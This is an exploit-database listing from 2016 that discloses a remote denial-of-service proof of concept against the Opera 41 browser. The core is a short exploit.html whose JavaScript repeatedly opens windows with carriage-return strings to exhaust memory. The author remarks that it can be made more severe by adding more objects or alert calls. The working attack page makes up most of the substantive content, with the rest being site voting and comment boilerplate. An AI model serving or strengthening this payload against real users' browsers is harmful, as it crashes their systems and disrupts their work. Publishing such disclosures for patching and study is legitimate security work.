Opera 41.0.2353.69 Carriage Return Null Object Memory Exhaustion

2016.12.12
Credit: Ajay Gowtham
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#Author: Ajay Gowtham aka AJOXR #Version information: #Version: 41.0.2353.69 - Opera is up to date #Update stream: Stable #System: Windows 10 64-bit (WoW64) #Browser identification: #Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like #Gecko) Chrome/54.0.2840.99 Safari/537.36 OPR/41.0.2353.69 (Edition #Campaign #34) #Product Description: Opera is a fast and secure browser. Developed in Europe, used by millions around the world. Now with a built-in ad blocker and free VPN. ------------------------------------------//exploit.html--------------------------------------------- <html> <title>Opera Carriage Return Null Object Memory Exhaustion Remote Dos.</title> <head> <script language="javascript"> window.open("\r\n\r\n"); window.refresh(); window.open("\r\n\r\n"); </script> </head> <body> <br> <br> <h2> <center>Opera Carriage Return Null Object Memory Exhaustion Remote Denial of Service.<br> <br>Proof of Concept</br> </br> </center></h2> <center> <b>Note:: Keep an eye on the memory consumption in Task Manager.</b><br><br> <hr></hr> <b>This POC has been designed with minimum object usage. This can be made more critical when combined with number of objects. For Example: using alert function will make it more exhaustive.</b></br></br> <b><br>Ajay Gowtham<br> AJOXR<br> <hr></hr> </body> </html> ----------------------------------------------------------------------------------------------------------- PoC: https://drive.google.com/file/d/0B2p8gG1WpnRnYjRsUlh5bjkyWlk/view?usp=sharing

References:

https://drive.google.com/file/d/0B2p8gG1WpnRnYjRsUlh5bjkyWlk/view?usp=sharing


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top